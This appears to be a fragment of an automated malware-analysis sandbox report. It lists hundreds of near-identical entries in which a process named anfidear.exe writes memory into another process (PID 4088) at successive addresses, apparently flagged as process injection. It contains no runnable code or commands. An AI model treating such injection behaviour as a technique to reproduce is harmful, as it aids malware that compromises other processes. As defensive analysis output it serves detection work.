Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A920000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A930000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ADD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B1B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B1C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B1D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B3F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DED0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DEE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2590000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A9D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: CE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2550000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2560000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2580000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A9E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A9F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AA90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AAA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AAB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AAC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AAD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AAE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AAF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AB00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AB10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AB20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AB30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AB40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AC50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AC60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AC70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AC80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AC90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ACA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ACB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ACC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ACD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ACE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ACF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AD00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AD10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AD20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AD30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AD40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AF90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AFA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AFB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AFC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AFD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AFE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AFF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B000000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B010000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B2F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B300000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B3E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B970000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B980000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B990000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B3B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B3C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B3D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B9A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B9B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B9C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B9D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B390000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B3A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B940000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B950000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B960000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 81A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 81B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B9E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B9F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: BA00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: BA10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: BA20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: BA30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DEF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DF90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DFA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DFB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DFC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DFD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DFE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: DFF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E000000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E010000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E020000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E030000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E040000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E050000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E060000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E070000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E080000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E090000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E0A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E0B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E0C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E0D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E0E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E0F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E100000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E110000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E120000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E130000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E140000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E150000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E160000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E170000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E180000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E190000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E1A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E1B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E1C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E1D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E1E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E1F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E200000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E210000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E220000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E230000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E240000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E250000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E260000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E270000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E280000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E290000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E2A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8400000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E2B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E2C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E2D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E2E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E2F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E300000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E310000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E320000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E330000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E340000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E450000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E460000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E470000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E480000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E490000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E4A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E4B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E4D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E4E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E4F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E500000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E510000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E520000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E530000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E540000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E550000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E560000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E570000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E580000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E590000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E5A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E5B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E5C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E5D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E5E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E5F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E600000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E610000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E620000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E630000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: E640000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FDD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FDE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FDF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FE90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FEA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FEB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FEC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FED0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FEE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FEF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FF90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FFA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FFB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FFC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FFD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FFE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: FFF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10000000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10010000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10020000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10030000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10040000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10050000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10060000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10070000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10080000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10090000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 100A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 100B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 100C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 100D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 100E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 100F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10100000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10110000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10120000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10130000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10140000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10150000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10160000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10170000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10180000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10190000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 101A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 101B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 101C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 101D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 101E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 101F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10200000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10210000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10220000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10230000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 10240000 value: 43Jump to behavior
